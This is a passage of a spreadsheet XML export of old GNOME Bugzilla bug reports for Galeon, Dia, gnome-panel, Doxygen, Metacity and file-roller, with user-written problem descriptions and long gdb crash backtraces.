Column widths should match those of the previous mail folder.
How often does this happen? 
Every time</t>
  </si>
  <si>
    <t>GALEON-50849</t>
  </si>
  <si>
    <t>File -&gt; Exit does not save screen size</t>
  </si>
  <si>
    <t>When you exit with File -&gt; Exit screen sizes are not saved. However if you
click the close box in the corner the screen size is saved. I imagine other
values are not saved as well.</t>
  </si>
  <si>
    <t>jmhorvat</t>
  </si>
  <si>
    <t>mattsm</t>
  </si>
  <si>
    <t>DIA-433917</t>
  </si>
  <si>
    <t>exports</t>
  </si>
  <si>
    <t>poor import of Dia's own export to Visia</t>
  </si>
  <si>
    <t>Please describe the problem:
Some shapes line thickness and text alignment are wrong when Dia imports a Visio file that it itself created.
Steps to reproduce:
1. Create a flowchart/Terminal Interrupt shape and stretch horizontally.
2. Add some text.
3. Save as Dia.
4. Export to Visio (vdx).
5. Open vdx file.
Actual results:
The lines of the VDX shape are thinner than the original Dia lines. The text is off-center. And the shape itself has grown an identical ovelayed twin (!) and a bunch of new connection points.
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>redferni</t>
  </si>
  <si>
    <t>ihok</t>
  </si>
  <si>
    <t>GNOME-PANEL-72167</t>
  </si>
  <si>
    <t>window list</t>
  </si>
  <si>
    <t>Crash after adding and removing tasklist applet.</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-panel
Severity: normal
Version: 1.5.10
Synopsis: Crash after adding and removing tasklist applet.
Bugzilla-Product: gnome-panel
Bugzilla-Component: Panel
BugBuddy-GnomeVersion: 2.0 (1.112.0)
Description:
Description of Problem:
The panel crashed after adding and removing the tasklist applet.
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
Expected Results:
How often does this happen?
Additional Information:
Debugging Information:
[New Thread 1024 (LWP 6176)]
0x40a6fa49 in __wait4 () from /lib/i686/libc.so.6
#0  0x40a6fa49 in __wait4 () from /lib/i686/libc.so.6
#1  0x40aed2cc in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x403226f3 in waitpid (pid=6952 stat_loc=0xbffff44c options=0)
    at wrapsyscall.c:172
#3  0x400870e1 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
#4  0x40320a85 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 49168 edi = 138281344 esi = 0 ebp = 3221223464 esp =
3221223408 ebx = 1083489940 edx = 138286048 ecx = 757738792 eax =
757738792 trapno = 14 err = 4 eip = 1083422510 cs = 35 __csh = 0
eflags = 66054 esp_at_signal = 3221223408 ss = 43 __ssh = 0 fpstate
= 0xbffff570 oldmask = 2147483648 cr2 = 757738799}) at signals.c:97
#5  
#6  0x4093b72e in g_type_check_instance_cast (type_instance=0x83e13e0 
    iface_type=135000592) at gtype.c:2604
#7  0x40e9d775 in tasklist_update (tasklist=0x83e0180) at tasklist.c:72
#8  0x40e9db93 in move_unminimized_windows_changed (client=0x80d1ee8 
    cnxn_id=2214592611 entry=0x83bc258 tasklist=0x83e0180) at
tasklist.c:310
#9  0x40218dc8 in notify_listeners_callback (listeners=0x80d2ee0 
    key=0x83e74d0
/apps/panel/profiles/default/applets/2t1014320652ut244902u501p6176r594411487k3221221132/prefs/move_unminimized_windows
    cnxn_id=2214592611 listener_data=0x83cbb18 user_data=0xbffff940)
    at gconf-client.c:2351
#10 0x4020945a in notify_listener_list (listeners=0x80d2ee0
list=0x83a203c 
    key=0x83e74d0
/apps/panel/profiles/default/applets/2t1014320652ut244902u501p6176r594411487k3221221132/prefs/move_unminimized_windows
    callback=0x40218cc4 
user_data=0xbffff940)
    at gconf-listeners.c:588
#11 0x402095d9 in ltable_notify (lt=0x80d2ee0 
    key=0x83e74d0
/apps/panel/profiles/default/applets/2t1014320652ut244902u501p6176r594411487k3221221132/prefs/move_unminimized_windows
    callback=0x40218cc4 
user_data=0xbffff940)
    at gconf-listeners.c:654
#12 0x40218e1c in notify_one_entry (client=0x80d1ee8 entry=0x83bc258)
    at gconf-client.c:2373
#13 0x40218ece in gconf_client_flush_notifies (client=0x80d1ee8)
    at gconf-client.c:2410
#14 0x40218c4e in notify_idle_callback (data=0x80d1ee8) at
gconf-client.c:2310
#15 0x40974b38 in g_idle_dispatch (source=0x83f6b50 
    callback=0x40218c38  user_data=0x80d1ee8)
    at gmain.c:3128
#16 0x40972506 in g_main_dispatch (context=0x80b6880) at gmain.c:1616
#17 0x4097331d in g_main_context_dispatch (context=0x80b6880) at
gmain.c:2160
#18 0x409736b0 in g_main_context_iterate (context=0x80b6880 block=1 
    dispatch=1 self=0x80a4d28) at gmain.c:2241
#19 0x40973d56 in g_main_loop_run (loop=0x8264708) at gmain.c:2461
#20 0x404e1ceb in gtk_main () at gtkmain.c:881
#21 0x0805a8c5 in main (argc=7 argv=0xbffffb84) at main.c:240
#22 0x409d16e7 in __libc_start_main (main=0x805a704  argc=7 
    ubp_av=0xbffffb84 init=0x8056bb4  fini=0x8093dc0  
    rtld_fini=0x4000dcd4  stack_end=0xbffffb7c)
    at ../sysdeps/generic/libc-start.c:129
Thread 1 (Thread 1024 (LWP 6176)):
#0  0x40a6fa49 in __wait4 () from /lib/i686/libc.so.6
#1  0x40aed2cc in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x403226f3 in waitpid (pid=6952 stat_loc=0xbffff44c options=0)
    at wrapsyscall.c:172
#3  0x400870e1 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
#4  0x40320a85 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 49168 edi = 138281344 esi = 0 ebp = 3221223464 esp =
3221223408 ebx = 1083489940 edx = 138286048 ecx = 757738792 eax =
757738792 trapno = 14 err = 4 eip = 1083422510 cs = 35 __csh = 0
eflags = 66054 esp_at_signal = 3221223408 ss = 43 __ssh = 0 fpstate
= 0xbffff570 oldmask = 2147483648 cr2 = 757738799}) at signals.c:97
#5  
#6  0x4093b72e in g_type_check_instance_cast (type_instance=0x83e13e0 
    iface_type=135000592) at gtype.c:2604
#7  0x40e9d775 in tasklist_update (tasklist=0x83e0180) at tasklist.c:72
#8  0x40e9db93 in move_unminimized_windows_changed (client=0x80d1ee8 
    cnxn_id=2214592611 entry=0x83bc258 tasklist=0x83e0180) at
tasklist.c:310
#9  0x40218dc8 in notify_listeners_callback (listeners=0x80d2ee0 
    key=0x83e74d0
/apps/panel/profiles/default/applets/2t1014320652ut244902u501p6176r594411487k3221221132/prefs/move_unminimized_windows
    cnxn_id=2214592611 listener_data=0x83cbb18 user_data=0xbffff940)
    at gconf-client.c:2351
#10 0x4020945a in notify_listener_list (listeners=0x80d2ee0
list=0x83a203c 
    key=0x83e74d0
/apps/panel/profiles/default/applets/2t1014320652ut244902u501p6176r594411487k3221221132/prefs/move_unminimized_windows
    callback=0x40218cc4 
user_data=0xbffff940)
    at gconf-listeners.c:588
#11 0x402095d9 in ltable_notify (lt=0x80d2ee0 
    key=0x83e74d0
/apps/panel/profiles/default/applets/2t1014320652ut244902u501p6176r594411487k3221221132/prefs/move_unminimized_windows
    callback=0x40218cc4 
user_data=0xbffff940)
    at gconf-listeners.c:654
#12 0x40218e1c in notify_one_entry (client=0x80d1ee8 entry=0x83bc258)
    at gconf-client.c:2373
#13 0x40218ece in gconf_client_flush_notifies (client=0x80d1ee8)
    at gconf-client.c:2410
#14 0x40218c4e in notify_idle_callback (data=0x80d1ee8) at
gconf-client.c:2310
#15 0x40974b38 in g_idle_dispatch (source=0x83f6b50 
    callback=0x40218c38  user_data=0x80d1ee8)
    at gmain.c:3128
#16 0x40972506 in g_main_dispatch (context=0x80b6880) at gmain.c:1616
#17 0x4097331d in g_main_context_dispatch (context=0x80b6880) at
gmain.c:2160
#18 0x409736b0 in g_main_context_iterate (context=0x80b6880 block=1 
    dispatch=1 self=0x80a4d28) at gmain.c:2241
#19 0x40973d56 in g_main_loop_run (loop=0x8264708) at gmain.c:2461
#20 0x404e1ceb in gtk_main () at gtkmain.c:881
#21 0x0805a8c5 in main (argc=7 argv=0xbffffb84) at main.c:240
#22 0x409d16e7 in __libc_start_main (main=0x805a704  argc=7 
    ubp_av=0xbffffb84 init=0x8056bb4  fini=0x8093dc0  
    rtld_fini=0x4000dcd4  stack_end=0xbffffb7c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40a6fa49 in __wait4 () from /lib/i686/libc.so.6
#0  0x40a6fa49 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x40aed2cc in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x403226f3 in waitpid (pid=6952 stat_loc=0xbffff44c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbffff44c
options = 0
result = 0
oldtype = 0
#3  0x400870e1 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
598			eret = waitpid(pid 
estatus = 1083432657
in_segv = 1
pid = 0
#4  0x40320a85 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 49168 edi = 138281344 esi = 0 ebp = 3221223464 esp =
3221223408 ebx = 1083489940 edx = 138286048 ecx = 757738792 eax =
757738792 trapno = 14 err = 4 eip = 1083422510 cs = 35 __csh = 0
eflags = 66054 esp_at_signal = 3221223408 ss = 43 __ssh = 0 fpstate
= 0xbffff570 oldmask = 2147483648 cr2 = 757738799}) at signals.c:97
	in signals.c
signo = 0
__value = 0xfffffe00 
#5  
No locals.
#6  0x4093b72e in g_type_check_instance_cast (type_instance=0x83e13e0 
    iface_type=135000592) at gtype.c:2604
2604		  is_instantiatable = node 
node = (TypeNode *) 0x2d2a2d28
iface = (TypeNode *) 0x82f8fc0
is_instantiatable = 0
check = 1
#7  0x40e9d775 in tasklist_update (tasklist=0x83e0180) at tasklist.c:72
72			gtk_widget_set_size_request (GTK_WIDGET (tasklist-&gt;tasklist)
tasklist = (TasklistData *) 0x83e0180
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-02-21 14:43 -------
Reassigning to the default owner of the component gnome-panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>DOXYGEN-473402</t>
  </si>
  <si>
    <t>Relative references in diagrams no longer work</t>
  </si>
  <si>
    <t>In Doxygen 1.5.2 I was able to create links to members in dot and mscgen diagrams using \ref MemberName. I am no longer able to do so with curreny Doxygen CVS.
The problem is demonstrated by the example code for the \msc command:
    http://www.stack.nl/~dimitri/doxygen/commands.html#cmdmsc
The diagram in the documentation for the Sender class refers to its Ack() method and similarly the diagram in the documentation for the Receiver class refers to its Command() method but Doxygen reports:
:23: Warning: unable to resolve reference to `Command()' for \ref command
:8: Warning: unable to resolve reference to `Ack()' for \ref command
The generated HTML links are to the enclosing class not to the referenced method.
The same example works fine in Doxygen 1.5.2.
Ian</t>
  </si>
  <si>
    <t>gnome-bugzilla</t>
  </si>
  <si>
    <t>METACITY-504692</t>
  </si>
  <si>
    <t>Windows open on one display then jump to another on first click</t>
  </si>
  <si>
    <t>Please describe the problem:
I'm currently running Metacity 2.21.2 from Hardy and I'm experiencing an odd issue with a multi-monitor configuration. My two monitors are side-by-side and windows tend to open first on the left monitor then once it's occupied they'll start on the right monitor.
The weirdness is that the window that opens on the right monitor (often firefox for me but seems to affect others as well) jumps to the other monitor on the first mouse click event. The click itself is delivered to the window - I know this because the first thing I usually do when I open Firefox is toggle the quickproxy status on the status bar. The status changes thus I know the click event wan delivered and handled despite the window moving.
Steps to reproduce:
This seems very reproducible for me. I open two applications which maximize on startup the first will be on the left monitor and the second one on the right. One click on the app on the right moves it to the left monitor still maximized.
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>elreydetodo</t>
  </si>
  <si>
    <t>FILE-ROLLER-482203</t>
  </si>
  <si>
    <t>file-roller crashed with SIGSEGV in fr_window_stop_batch()</t>
  </si>
  <si>
    <t>The bug has been opened on https://bugs.launchpad.net/ubuntu/+source/file-roller/+bug/146914
Binary package hint: file-roller
I am trying to burn some directories with pictures to dvd and clicked from the file-manager to create an archive. And cancelled on the question for what type of archive. Then I opened a blank DVD and dragged 4 directories to cd/DVD creator window and then got this crash-detection while CD/DVD creator still functions properly
...
Package: file-roller 2.20.0-0ubuntu1
...
#0  fr_window_stop_batch (window=0x8109800) at fr-window.c:7841
No locals.
#1  0x0805a215 in destroy_cb (widget=0x81f3000 data=0x8115700) at dlg-batch-add.c:76
No locals.
#2  0xb79d7c09 in IA__g_cclosure_marshal_VOID__VOID (closure=0x8272958 return_value=0x0 n_param_values=1 
    param_values=0xbf8ff5ac invocation_hint=0xbf8ff4bc marshal_data=0x805a1f0)
    at /build/buildd/glib2.0-2.14.1/gobject/gmarshal.c:77
	data1 = (gpointer) 0x81f3000
	data2 = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_cclosure_marshal_VOID__VOID
#3  0xb79ca772 in IA__g_closure_invoke (closure=0x8272958 return_value=0x0 n_param_values=1 param_values=0xbf8ff5ac 
    invocation_hint=0xbf8ff4bc) at /build/buildd/glib2.0-2.14.1/gobject/gclosure.c:490
	marshal = (GClosureMarshal) 0x8053d68 
	marshal_data = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#4  0xb79db323 in signal_emit_unlocked_R (node=0x809ee10 detail=0 instance=0x81f3000 emission_return=0x0 
    instance_and_params=0xbf8ff5ac) at /build/buildd/glib2.0-2.14.1/gobject/gsignal.c:2440
	tmp = 
	handler = (Handler *) 0x82722e0
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0x0 instance = 0x81f3000 ihint = {signal_id = 2 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x809eac8
	handler_list = (Handler *) 0x81f08c0
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
      v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
      v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 2
	max_sequential_handler_number = 1059
	return_value_altered = 1
#5  0xb79dc847 in IA__g_signal_emit_valist (instance=0x81f3000 signal_id=2 detail=0 var_args=0xbf8ff7ec JyÃ•Â·Â¼\220Ã¥Â·)
    at /build/buildd/glib2.0-2.14.1/gobject/gsignal.c:2199
	_flags = 
	_vtable = 
	_cvalues = {{v_int = -1081084132 v_long = -1081084132 v_int64 = 588433749949019932 
    v_double = 2.5115376885230439e-269 v_pointer = 0xbf8ff71c} {v_int = -1215349632 v_long = -1215349632 
    v_int64 = -4643221073984275328 v_double = -0.015607898809234522 v_pointer = 0xb78f3c80} {v_int = -1214360860 
    v_long = -1214360860 v_int64 = 579211389879341796 v_double = 6.0979780743673255e-270 v_pointer = 0xb79e52e4} {
    v_int = -1081084132 v_long = -1081084132 v_int64 = -4643220867691579620 v_double = -0.015608256670016689 
    v_pointer = 0xbf8ff71c} {v_int = -1214360860 v_long = -1214360860 v_int64 = 585239256220193508 
    v_double = 1.4758581201602349e-269 v_pointer = 0xb79e52e4} {v_int = 1073741825 v_long = 1073741825 
    v_int64 = 933081645057 v_double = 4.6100358558769948e-312 v_pointer = 0x40000001} {v_int = -1210711442 
    v_long = -1210711442 v_int64 = 7379223150 v_double = 3.6458206514114277e-314 v_pointer = 0xb7d6026e} {
    v_int = 1073741828 v_long = 1073741828 v_int64 = -5219912480922271740 v_double = -4.4691639291822043e-41 
    v_pointer = 0x40000004}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 3079791078 data = {{v_int = -1214515656 v_uint = 3080451640 v_long = -1214515656 
      v_ulong = 3080451640 v_int64 = -5196105857445923272 v_uint64 = 13250638216263628344 v_float = -1.85920944e-05 
      v_double = -1.8113306104182156e-39 v_pointer = 0xb79bf638} {v_int = -1081084008 v_uint = 3213883288 
      v_long = -1081084008 v_ulong = 3213883288 v_int64 = -5215640176028551272 v_uint64 = 13231103897681000344 
      v_float = -1.12474346 v_double = -8.702504646034556e-41 v_pointer = 0xbf8ff798}}}
	error = 
	instance_and_params = (GValue *) 0xbf8ff5ac
	stack_values = {{g_type = 135160064 data = {{v_int = 136261632 v_uint = 136261632 v_long = 136261632 
        v_ulong = 136261632 v_int64 = 136261632 v_uint64 = 136261632 v_float = 4.79037458e-34 
        v_double = 6.7322191217462267e-316 v_pointer = 0x81f3000} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 136446680 data = {{
        v_int = 64 v_uint = 64 v_long = 64 v_ulong = 64 v_int64 = -4643222245294997440 
        v_uint64 = 13803521828414554176 v_float = 8.96831017e-44 v_double = -0.015605866909027211 v_pointer = 0x40} {
        v_int = -1216309567 v_uint = 3078657729 v_long = -1216309567 v_ulong = 3078657729 
        v_int64 = 586034031326435009 v_uint64 = 586034031326435009 v_float = -1.53289893e-05 
        v_double = 1.7046475284637858e-269 v_pointer = 0xb78096c1}}} {g_type = 3079561204 data = {{
        v_int = -1215401664 v_uint = 3079565632 v_long = -1215401664 v_ulong = 3079565632 
        v_int64 = 589297759795704128 v_uint64 = 589297759795704128 v_float = -1.69804553e-05 
        v_double = 2.8020555171228069e-269 v_pointer = 0xb78e7140} {v_int = -1081084392 v_uint = 3213882904 
        v_long = -1081084392 v_ulong = 3213882904 v_int64 = -5223938070024292840 v_uint64 = 13222806003685258776 
        v_float = -1.12469769 v_double = -2.4169612296709189e-41 v_pointer = 0xbf8ff618}}} {g_type = 3079565632 
    data = {{v_int = 136923976 v_uint = 136923976 v_long = 136923976 v_ulong = 136923976 
        v_int64 = -5220110312347710648 v_uint64 = 13226633761361840968 v_float = 5.09450803e-34 
        v_double = -4.3683115632191556e-41 v_pointer = 0x8294b48} {v_int = 136406976 v_uint = 136406976 
        v_long = 136406976 v_ulong = 136406976 v_int64 = -5220585129572735040 v_uint64 = 13226158944136816576 
        v_float = 4.85711327e-34 v_double = -4.1262547694742863e-41 v_pointer = 0x82167c0}}} {g_type = 137206568 
    data = {{v_int = 136446680 v_uint = 136446680 v_long = 136446680 v_ulong = 136446680 v_int64 = 275014353624 
        v_uint64 = 275014353624 v_float = 4.87534445e-34 v_double = 1.3587514423885452e-312 v_pointer = 0x82202d8} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = -5216309541305581568 v_uint64 = 13230434532403970048 
        v_float = 0 v_double = -8.0200339846394215e-41 v_pointer = 0x0}}} {g_type = 137206576 data = {{
        v_int = 137206608 v_uint = 137206608 v_long = 137206608 v_ulong = 137206608 v_int64 = -4643221970279883952 
        v_uint64 = 13803522103429667664 v_float = 5.22428628e-34 v_double = -0.015606343984200827 
        v_pointer = 0x82d9b50} {v_int = -1215063711 v_uint = 3079903585 v_long = -1215063711 v_ulong = 3079903585 
        v_int64 = 589297759796042081 v_uint64 = 589297759796042081 v_float = -1.75951882e-05 
        v_double = 2.8020555172364414e-269 v_pointer = 0xb7939961}}} {g_type = 326 data = {{v_int = -1081084260 
        v_uint = 3213883036 v_long = -1081084260 v_ulong = 3213883036 v_int64 = -5219862708701104484 
        v_uint64 = 13226881365008447132 v_float = -1.12471342 v_double = -4.4945372805232126e-41 
        v_pointer = 0xbf8ff69c} {v_int = -1220644428 v_uint = 3074322868 v_long = -1220644428 v_ulong = 3074322868 
        v_int64 = 7369290164 v_uint64 = 7369290164 v_float = -1.13513561e-05 v_double = 3.6409131042682057e-314 
        v_pointer = 0xb73e71b4}}} {g_type = 3213882952 data = {{v_int = -1220653179 v_uint = 3074314117 
        v_long = -1220653179 v_ulong = 3074314117 v_int64 = 7369281413 v_uint64 = 7369281413 
        v_float = -1.13433971e-05 v_double = 3.6409087806997389e-314 v_pointer = 0xb73e4f85} {v_int = -1214516708 
        v_uint = 3080450588 v_long = -1214516708 v_ulong = 3080450588 v_int64 = -4643221555019779556 
        v_uint64 = 13803522518689772060 v_float = -1.85901808e-05 v_double = -0.015607064345652559 
        v_pointer = 0xb79bf21c}}} {g_type = 3079987522 data = {{v_int = 134827296 v_uint = 134827296 
        v_long = 134827296 v_ulong = 134827296 v_int64 = 433926524192 v_uint64 = 433926524192 
        v_float = 4.13175979e-34 v_double = 2.1438818842256777e-312 v_pointer = 0x8094d20} {v_int = 131 v_uint = 131 
        v_long = 131 v_ulong = 131 v_int64 = 588083998958289027 v_uint64 = 588083998958289027 
        v_float = 1.83570099e-43 v_double = 2.3939361371429271e-269 v_pointer = 0x83}}} {g_type = 136782432 data = {{
        v_int = 3 v_uint = 3 v_long = 3 v_ulong = 3 v_int64 = 585863500866256899 v_uint64 = 585863500866256899 
        v_float = 4.20389539e-45 v_double = 1.6473077432851905e-269 v_pointer = 0x3} {v_int = 32 v_uint = 32 
        v_long = 32 v_ulong = 32 v_int64 = 579079445403402272 v_uint64 = 579079445403402272 v_float = 4.48415509e-44 
        v_double = 5.9870643423282999e-270 v_pointer = 0x20}}} {g_type = 3 data = {{v_int = 24 v_uint = 24 
        v_long = 24 v_ulong = 24 v_int64 = -5219862711914987496 v_uint64 = 13226881361794564120 
        v_float = 3.36311631e-44 v_double = -4.494535642119683e-41 v_pointer = 0x18} {v_int = -1220644428 
        v_uint = 3074322868 v_long = -1220644428 v_ulong = 3074322868 v_int64 = 588433749809459636 
        v_uint64 = 588433749809459636 v_float = -1.13513561e-05 v_double = 2.5115376415967799e-269 
        v_pointer = 0xb73e71b4}}} {g_type = 3213883032 data = {{v_int = -1215343995 v_uint = 3079623301 
        v_long = -1215343995 v_ulong = 3079623301 v_int64 = -5242627895225003387 v_uint64 = 13204116178484548229 
        v_float = -1.70853546e-05 v_double = -1.3651635181705505e-42 v_pointer = 0xb78f5285} {v_int = 1 v_uint = 1 
        v_long = 1 v_ulong = 1 v_int64 = -5219912481996013567 v_uint64 = 13226831591713538049 
        v_float = 1.40129846e-45 v_double = -4.4691633817999901e-41 v_pointer = 0x1}}} {g_type = 3080012196 data = {{
        v_int = -1209751508 v_uint = 3085215788 v_long = -1209751508 v_ulong = 3085215788 
        v_int64 = -5195843160061466580 v_uint64 = 13250900913648085036 v_float = -2.72580291e-05 
        v_double = -1.8970396312445546e-39 v_pointer = 0xb7e4a82c} {v_int = -1081084168 v_uint = 3213883128 
        v_long = -1081084168 v_ulong = 3213883128 v_int64 = -5218298391417587976 v_uint64 = 13228445682291963640 
        v_float = -1.12472439 v_double = -5.9922445280683621e-41 v_pointer = 0xbf8ff6f8}}} {g_type = 1 data = {{
        v_int = -1215350612 v_uint = 3079616684 v_long = -1215350612 v_ulong = 3079616684 
        v_int64 = -4643221280142706516 v_uint64 = 13803522793566845100 v_float = -1.70733183e-05 
        v_double = -0.015607541181364169 v_pointer = 0xb78f38ac} {v_int = -1215145687 v_uint = 3079821609 
        v_long = -1215145687 v_ulong = 3079821609 v_int64 = 7374788905 v_uint64 = 7374788905 
        v_float = -1.74460747e-05 v_double = 3.6436298432916844e-314 v_pointer = 0xb7925929}}} {g_type = 3085215788 
    data = {{v_int = -1214398581 v_uint = 3080568715 v_long = -1214398581 v_ulong = 3080568715 
        v_int64 = -5215266806064889973 v_uint64 = 13231477267644661643 v_float = -1.88050526e-05 
        v_double = -9.0831847541744811e-41 v_pointer = 0xb79dbf8b} {v_int = 134858160 v_uint = 134858160 
        v_long = 134858160 v_ulong = 134858160 v_int64 = 4429825456 v_uint64 = 4429825456 v_float = 4.14593184e-34 
        v_double = 2.1886245748826345e-314 v_pointer = 0x809c5b0}}} {g_type = 3213883144 data = {{v_int = -1214395895 
        v_uint = 3080571401 v_long = -1214395895 v_ulong = 3080571401 v_int64 = 585239256220158473 
        v_uint64 = 585239256220158473 v_float = -1.88099384e-05 v_double = 1.4758581201543448e-269 
        v_pointer = 0xb79dca09} {v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 932007903233 
        v_uint64 = 932007903233 v_float = 1.40129846e-45 v_double = 4.6047308663995816e-312 v_pointer = 0x1}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0xbf8ff5c0
	node = (SignalNode *) 0x809ee10
	i = 40
	n_params = 0
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#6  0xb79dca09 in IA__g_signal_emit (instance=0x81f3000 signal_id=2 detail=0)
    at /build/buildd/glib2.0-2.14.1/gobject/gsignal.c:2243
	var_args = 0xbf8ff7ec JyÃ•Â·Â¼\220Ã¥Â·
#7  0xb7c52c91 in gtk_object_dispose (gobject=0x81f3000) at /build/buildd/gtk+2.0-2.12.0/gtk/gtkobject.c:418
No locals.
#8  0xb7d583e1 in gtk_widget_dispose (object=0x81f3000) at /build/buildd/gtk+2.0-2.12.0/gtk/gtkwidget.c:7851
No locals.
#9  0xb7d653b6 in gtk_window_dispose (object=0x81f3000) at /build/buildd/gtk+2.0-2.12.0/gtk/gtkwindow.c:1968
No locals.
#10 0xb79cce30 in IA__g_object_run_dispose (object=0x81f3000) at /build/buildd/glib2.0-2.14.1/gobject/gobject.c:573
	__PRETTY_FUNCTION__ = IA__g_object_run_dispose
#11 0xb7c52975 in IA__gtk_object_destroy (object=0x81f3000) at /build/buildd/gtk+2.0-2.12.0/gtk/gtkobject.c:403
	__PRETTY_FUNCTION__ = IA__gtk_object_destroy
#12 0xb7d58675 in IA__gtk_widget_destroy (widget=0x81f3000) at /build/buildd/gtk+2.0-2.12.0/gtk/gtkwidget.c:2886
	__PRETTY_FUNCTION__ = IA__gtk_widget_destroy
#13 0xb79d7c09 in IA__g_cclosure_marshal_VOID__VOID (closure=0x82729b8 return_value=0x0 n_param_values=1 
    param_values=0xbf8ffacc invocation_hint=0xbf8ff9dc marshal_data=0x8053328)
    at /build/buildd/glib2.0-2.14.1/gobject/gmarshal.c:77
	data1 = (gpointer) 0x81f3000
	data2 = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_cclosure_marshal_VOID__VOID
#14 0xb79ca772 in IA__g_closure_invoke (closure=0x82729b8 return_value=0x0 n_param_values=1 param_values=0xbf8ffacc 
    invocation_hint=0xbf8ff9dc) at /build/buildd/glib2.0-2.14.1/gobject/gclosure.c:490
	marshal = (GClosureMarshal) 0x8053d68 
	marshal_data = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#15 0xb79db323 in signal_emit_unlocked_R (node=0x80d90f0 detail=0 instance=0x818fee8 emission_return=0x0 
    instance_and_params=0xbf8ffacc) at /build/buildd/glib2.0-2.14.1/gobject/gsignal.c:2440
	tmp = 
	handler = (Handler *) 0x8272320
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0xbf8ffe94 instance = 0x818fee8 ihint = {signal_id = 96 detail = 0 
    run_type = G_SIGNAL_RUN_FIRST} state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x80d90c8
	handler_list = (Handler *) 0x826e540
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
      v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
      v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 96
	max_sequential_handler_number = 1059
	return_value_altered = 1
#16 0xb79dc847 in IA__g_signal_emit_valist (instance=0x818fee8 signal_id=96 detail=0 
    var_args=0xbf8ffd0c Â¼Ã\236Â·xÂ¦\237Â·Ã¨Ã¾\030\b(Ã½\217Â¿\216Â¬ÂµÂ·Ã¨Ã¾\030\bPÂ¬ÂµÂ·HÃ½\217Â¿\t|\235Â·Ã¨Ã¾\030\bÃ¨\020\r\b )
    at /build/buildd/glib2.0-2.14.1/gobject/gsignal.c:2199
	_flags = 
	_vtable = 
	_cvalues = {{v_int = 3 v_long = 3 v_int64 = 3 v_double = 1.4821969375237396e-323 v_pointer = 0x3} {
    v_int = 1078132736 v_long = 1078132736 v_int64 = 1078132736 v_double = 5.3266834651443016e-315 
    v_pointer = 0x40430000} {v_int = 1076887552 v_long = 1076887552 v_int64 = 327494402048 
    v_double = 1.6180373325723797e-312 v_pointer = 0x40300000} {v_int = 0 v_long = 0 v_int64 = 4631107791820423168 
    v_double = 42 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 4625196817309499392 v_double = 16 
    v_pointer = 0x0} {v_int = 80 v_long = 80 v_int64 = 80 v_double = 3.9525251667299724e-322 v_pointer = 0x50} {
    v_int = 1078362112 v_long = 1078362112 v_int64 = 1078362112 v_double = 5.3278167331601064e-315 
    v_pointer = 0x40468000} {v_int = 1076887552 v_long = 1076887552 v_int64 = 357559173120 
    v_double = 1.7665770379399488e-312 v_pointer = 0x40300000}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 1079230464 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 4625196817309499392 v_uint64 = 4625196817309499392 v_float = 0 v_double = 16 v_pointer = 0x0} {
      v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = -5238340142258716672 v_uint64 = 13208403931450834944 
      v_float = 0 v_double = -2.6615543223775971e-42 v_pointer = 0x0}}}
	error = 
	instance_and_params = (GValue *) 0xbf8ffacc
	stack_values = {{g_type = 135074024 data = {{v_int = 135855848 v_uint = 135855848 v_long = 135855848 
